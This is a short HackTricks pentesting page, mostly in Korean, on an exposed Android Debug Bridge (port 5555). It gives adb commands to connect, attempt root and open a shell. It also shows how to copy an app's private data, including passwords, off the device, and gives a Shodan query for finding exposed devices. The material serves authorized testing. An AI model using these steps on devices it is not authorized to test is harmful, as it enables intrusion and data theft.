5555 - Android Debug Bridge

Support HackTricks

기본 정보

From the docs:

Android Debug Bridge (adb)는 장치와 통신할 수 있는 다목적 명령줄 도구입니다. adb 명령은 앱 설치 및 디버깅과 같은 다양한 장치 작업을 용이하게 하며, 장치에서 다양한 명령을 실행할 수 있는 Unix 셸에 대한 액세스를 제공합니다.

기본 포트: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

ADB 서비스가 장치의 포트에서 실행되고 있고 연결할 수 있다면, 시스템 내부에서 셸을 얻을 수 있습니다:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

더 많은 ADB 명령어는 다음 페이지를 확인하세요:

ADB Commands

앱 데이터 덤프

애플리케이션의 데이터를 완전히 다운로드하려면 다음을 수행할 수 있습니다:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

You can use this trick to 민감한 정보(예: 크롬 비밀번호)를 검색할 수 있습니다. 이에 대한 자세한 정보는 제공된 여기에서 확인하세요.

Shodan

  • android debug bridge

Support HackTricks

Last updated